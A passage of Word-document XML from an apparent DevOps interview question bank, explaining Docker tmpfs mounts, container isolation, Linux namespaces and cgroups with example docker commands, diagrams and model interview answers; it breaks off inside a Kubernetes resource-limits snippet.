        <w:t>The data exists only while the container is running and is automatically removed when the container stops.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How tmpfs Works</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>tmpfs Mount</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>RAM</w:t>
        <w:br/>
        <w:t>No data is written to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container writable layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Host filesystem</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Create a tmpfs Mount</w:t>
        <w:br/>
        <w:t>docker run --tmpfs /app/cache nginx</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--mount type=tmpfs,destination=/app/cache \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>docker run -it \</w:t>
        <w:br/>
        <w:t>--tmpfs /tmp \</w:t>
        <w:br/>
        <w:t>ubuntu</w:t>
        <w:br/>
        <w:t>Inside the container:</w:t>
        <w:br/>
        <w:t>echo "hello" &gt; /tmp/test.txt</w:t>
        <w:br/>
        <w:t>The file exists while the container is running.</w:t>
        <w:br/>
        <w:t>After the container stops:</w:t>
        <w:br/>
        <w:t>test.txt → Deleted</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use Cases</w:t>
        <w:br/>
        <w:t>1. Sensitive Data</w:t>
        <w:br/>
        <w:t>Passwords</w:t>
        <w:br/>
        <w:t>Tokens</w:t>
        <w:br/>
        <w:t>Temporary Secrets</w:t>
        <w:br/>
        <w:t>Since data is never written to disk, exposure risk is reduced.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Temporary Cache</w:t>
        <w:br/>
        <w:t>Application Cache</w:t>
        <w:br/>
        <w:t>Session Data</w:t>
        <w:br/>
        <w:t>Scratch Files</w:t>
        <w:br/>
        <w:t>Provides faster access because data is stored in RAM.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. High-Speed Temporary Storage</w:t>
        <w:br/>
        <w:t>Applications requiring very fast temporary I/O can benefit from tmpfs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Set Size Limit</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--mount type=tmpfs,destination=/tmp,tmpfs-size=100m \</w:t>
        <w:br/>
        <w:t>ubuntu</w:t>
        <w:br/>
        <w:t>Limits tmpfs storage to 100 MB.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>tmpfs vs Volume vs Bind Mount</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>tmpfs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Volume</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bind Mount</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stored In</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RAM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Disk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Filesystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Persistent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fastest</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fast</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Depends on Disk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Survives Restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Suitable for Secrets</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>✅ Very fast I/O</w:t>
        <w:br/>
        <w:t>✅ No disk writes</w:t>
        <w:br/>
        <w:t>✅ Good for temporary data</w:t>
        <w:br/>
        <w:t>✅ Better handling of sensitive temporary information</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Disadvantages</w:t>
        <w:br/>
        <w:t>❌ Data lost when container stops</w:t>
        <w:br/>
        <w:t>❌ Consumes host memory</w:t>
        <w:br/>
        <w:t>❌ Not suitable for databases or persistent storage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>tmpfs mounts are in-memory filesystems used by Docker to store temporary container data directly in RAM instead of on disk. Data stored in a tmpfs mount is not persisted and is automatically removed when the container stops. tmpfs mounts are commonly used for temporary caches, session data, and sensitive information that should not be written to disk. They provide high-performance storage but consume host memory and are unsuitable for workloads requiring persistent data retention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q361. What is container isolation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Container Isolation?</w:t>
        <w:br/>
        <w:t>Container isolation is the mechanism that separates containers from each other and from the host system, ensuring that processes, files, networks, and resources inside one container cannot directly interfere with others.</w:t>
        <w:br/>
        <w:t>Although containers share the same host OS kernel, they behave as if they are running in their own independent environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Is Isolation Important?</w:t>
        <w:br/>
        <w:t>Without isolation:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Can access Container B's files/processes</w:t>
        <w:br/>
        <w:t>With isolation:</w:t>
        <w:br/>
        <w:t>Container A        Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │                   │</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▼                   ▼</w:t>
        <w:br/>
        <w:t>Own Filesystem    Own Filesystem</w:t>
        <w:br/>
        <w:t>Own Processes     Own Processes</w:t>
        <w:br/>
        <w:t>Own Network       Own Network</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Linux Technologies Behind Container Isolation</w:t>
        <w:br/>
        <w:t>1. Namespaces</w:t>
        <w:br/>
        <w:t>Namespaces provide isolation.</w:t>
        <w:br/>
        <w:t>Types:</w:t>
        <w:br/>
        <w:t>Namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolates</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PID</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Processes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>NET</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>MNT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Filesystems/Mounts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>IPC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Inter-process communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>UTS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hostname and domain name</w:t>
        <w:br/>
        <w:tab/>
        <w:t>USER</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Users and Groups</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Inside a container:</w:t>
        <w:br/>
        <w:t>ps aux</w:t>
        <w:br/>
        <w:t>The container only sees its own processes, not all host processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. cgroups (Control Groups)</w:t>
        <w:br/>
        <w:t>cgroups limit resource usage.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--memory=512m \</w:t>
        <w:br/>
        <w:t>--cpus=1 \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Memory = 512 MB</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CPU = 1 core</w:t>
        <w:br/>
        <w:t>This prevents one container from consuming all host resources.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Filesystem Isolation</w:t>
        <w:br/>
        <w:t>Each container gets its own filesystem view.</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── /app</w:t>
        <w:br/>
        <w:t>Changes inside one container do not affect another container’s filesystem.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Network Isolation</w:t>
        <w:br/>
        <w:t>Each container gets its own:</w:t>
        <w:br/>
        <w:t>IP Address</w:t>
        <w:br/>
        <w:t>Routing Table</w:t>
        <w:br/>
        <w:t>Network Interfaces</w:t>
        <w:br/>
        <w:t>Containers communicate only through configured networks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security Isolation</w:t>
        <w:br/>
        <w:t>Additional security layers include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Linux Capabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Seccomp Profiles</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AppArmor</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SELinux</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Read-only Filesystems</w:t>
        <w:br/>
        <w:t>These reduce privileges available to containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container vs VM Isolation</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OS-level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hardware-level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kernel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shared</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup Time</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Seconds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minutes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation Strength</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stronger</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VMs generally provide stronger isolation because each VM has its own operating system kernel.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Run two containers:</w:t>
        <w:br/>
        <w:t>docker run -d --name app1 nginx</w:t>
        <w:br/>
        <w:t>docker run -d --name app2 nginx</w:t>
        <w:br/>
        <w:t>Each container:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Has its own process space</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Has its own filesystem</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Has its own network namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cannot directly access the other container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Container isolation is the mechanism that separates container workloads from each other and from the host system while sharing the same operating system kernel. It is primarily achieved through Linux namespaces, which isolate processes, networking, filesystems, and users, and cgroups, which enforce resource limits on CPU, memory, and I/O. Additional security controls such as seccomp, AppArmor, SELinux, and Linux capabilities further strengthen isolation. While containers provide lightweight and efficient isolation, virtual machines offer stronger isolation because they use separate operating system kernels. In modern cloud-native environments, container isolation is fundamental for multi-tenant security and workload stability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q362. Explain namespaces in Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Linux Namespaces?</w:t>
        <w:br/>
        <w:t>Linux Namespaces are a kernel feature that provides isolation of system resources for processes.</w:t>
        <w:br/>
        <w:t>They are one of the core technologies behind containers such as Docker and Kubernetes.</w:t>
        <w:br/>
        <w:t>A namespace makes a process believe it has its own dedicated view of a resource, even though the underlying system resources are shared.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Namespaces?</w:t>
        <w:br/>
        <w:t>Without namespaces:</w:t>
        <w:br/>
        <w:t>Host</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Process A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Process B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Process C</w:t>
        <w:br/>
        <w:t>All processes can see the same:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Process IDs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network interfaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Mount points</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Hostname</w:t>
        <w:br/>
        <w:t>With namespaces:</w:t>
        <w:br/>
        <w:t>Container A          Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Process 1         ├─ Process 1</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Process 2         └─ Process 2</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Process 3</w:t>
        <w:br/>
        <w:t>Each container sees its own isolated environment.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Linux Namespaces</w:t>
        <w:br/>
        <w:t>1. PID Namespace</w:t>
        <w:br/>
        <w:t>Isolates process IDs.</w:t>
        <w:br/>
        <w:t>Inside a container:</w:t>
        <w:br/>
        <w:t>ps -ef</w:t>
        <w:br/>
        <w:t>You may see:</w:t>
        <w:br/>
        <w:t>PID  COMMAND</w:t>
        <w:br/>
        <w:t>1    nginx</w:t>
        <w:br/>
        <w:t>2    worker</w:t>
        <w:br/>
        <w:t>The container cannot see host processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Network Namespace (NET)</w:t>
        <w:br/>
        <w:t>Provides isolated:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP addresses</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routing tables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network interfaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Firewall rules</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Container A → 172.17.0.2</w:t>
        <w:br/>
        <w:t>Container B → 172.17.0.3</w:t>
        <w:br/>
        <w:t>Each container has its own network stack.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Mount Namespace (MNT)</w:t>
        <w:br/>
        <w:t>Isolates filesystem mount points.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t>/app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t>/app</w:t>
        <w:br/>
        <w:t>Both may have different contents despite the same path.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. UTS Namespace</w:t>
        <w:br/>
        <w:t>Isolates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Hostname</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Domain name</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>hostname</w:t>
        <w:br/>
        <w:t>Container A:</w:t>
        <w:br/>
        <w:t>web-01</w:t>
        <w:br/>
        <w:t>Container B:</w:t>
        <w:br/>
        <w:t>db-01</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. IPC Namespace</w:t>
        <w:br/>
        <w:t>Isolates Inter-Process Communication resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shared memory</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Message queues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Semaphores</w:t>
        <w:br/>
        <w:t>Processes in one container cannot access IPC resources of another container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. User Namespace</w:t>
        <w:br/>
        <w:t>Isolates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * User IDs (UID)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Group IDs (GID)</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Container Root (UID 0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Mapped To</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Host UID 100000</w:t>
        <w:br/>
        <w:t>A process may appear as root inside the container but not have root privileges on the host.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Cgroup Namespace</w:t>
        <w:br/>
        <w:t>Isolates visibility of control groups.</w:t>
        <w:br/>
        <w:t>Containers see only their own resource limits.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Docker Uses Namespaces</w:t>
        <w:br/>
        <w:t>When you run:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Docker creates namespaces for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * PID</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * NET</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MNT</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * UTS</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IPC</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * USER (optional)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CGROUP</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Own Processes</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Own Network</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Own Filesystem</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Own Hostname</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View Namespaces</w:t>
        <w:br/>
        <w:t>On Linux:</w:t>
        <w:br/>
        <w:t>lsns</w:t>
        <w:br/>
        <w:t>Shows all namespaces on the system.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>ip netns list</w:t>
        <w:br/>
        <w:t>Shows network namespaces.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Namespaces vs cgroups</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespaces</w:t>
        <w:br/>
        <w:tab/>
        <w:t>cgroups</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Limiting</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate process table</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit CPU/Memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container Visibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restricted</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controlled</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Function</w:t>
        <w:br/>
        <w:tab/>
        <w:t>“What can I see?”</w:t>
        <w:br/>
        <w:tab/>
        <w:t>“How much can I use?”</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Linux namespaces are a kernel feature that provides isolation of system resources for processes. They form the foundation of container technologies such as Docker and Kubernetes. Different namespace types isolate processes (PID), networking (NET), filesystems (MNT), hostnames (UTS), IPC resources, users (USER), and cgroup visibility. By creating separate namespaces, containers obtain their own isolated view of the system while still sharing the host kernel. Namespaces work together with cgroups, which enforce resource limits, to provide secure and efficient container isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q363. What are cgroups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are cgroups?</w:t>
        <w:br/>
        <w:t>cgroups (Control Groups) are a Linux kernel feature used to limit, prioritize, monitor, and isolate resource usage of processes.</w:t>
        <w:br/>
        <w:t>While namespaces provide isolation, cgroups control how much CPU, memory, disk I/O, and network resources a process or container can consume.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need cgroups?</w:t>
        <w:br/>
        <w:t>Without cgroups:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Uses 90% CPU</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Starved of resources</w:t>
        <w:br/>
        <w:t>One application can consume all system resources.</w:t>
        <w:br/>
        <w:t>With cgroups:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ CPU: 2 cores</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Memory: 2 GB</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ CPU: 1 core</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Memory: 1 GB</w:t>
        <w:br/>
        <w:t>Each container gets controlled resource allocation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Resources Managed by cgroups</w:t>
        <w:br/>
        <w:t>Resource</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit CPU cores/usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit RAM usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Disk I/O</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control read/write rates</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prioritize network traffic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Processes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit number of processes (PIDs)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Example</w:t>
        <w:br/>
        <w:t>Limit memory:</w:t>
        <w:br/>
        <w:t>docker run -d --memory=512m nginx</w:t>
        <w:br/>
        <w:t>Limit CPU:</w:t>
        <w:br/>
        <w:t>docker run -d --cpus=1 nginx</w:t>
        <w:br/>
        <w:t>Limit both:</w:t>
        <w:br/>
        <w:t>docker run -d \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --memory=1g \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cpus=2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How cgroups Work</w:t>
        <w:br/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▼</w:t>
        <w:br/>
        <w:t>cgroups</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌─┴─────────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼           ▼</w:t>
        <w:br/>
        <w:t>Container A  Container B</w:t>
        <w:br/>
        <w:t>The kernel enforces resource limits for each group of processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common cgroup Controllers</w:t>
        <w:br/>
        <w:t>CPU Controller</w:t>
        <w:br/>
        <w:t>CPU shares</w:t>
        <w:br/>
        <w:t>CPU quota</w:t>
        <w:br/>
        <w:t>CPU affinity</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run --cpus=2 nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Memory Controller</w:t>
        <w:br/>
        <w:t>Memory limits</w:t>
        <w:br/>
        <w:t>OOM handling</w:t>
        <w:br/>
        <w:t>Swap limits</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run --memory=1g nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PID Controller</w:t>
        <w:br/>
        <w:t>Limits the number of processes.</w:t>
        <w:br/>
        <w:t>docker run --pids-limit=100 nginx</w:t>
        <w:br/>
        <w:t>Prevents fork bombs and runaway processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Block I/O Controller</w:t>
        <w:br/>
        <w:t>Controls disk throughput.</w:t>
        <w:br/>
        <w:t>Read Rate</w:t>
        <w:br/>
        <w:t>Write Rate</w:t>
        <w:br/>
        <w:t>IO Priority</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes and cgroups</w:t>
        <w:br/>
        <w:t>Pod resource requests and limits are enforced through cgroups.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "512Mi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "500m"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  limits:</w:t>
        <w:br/>
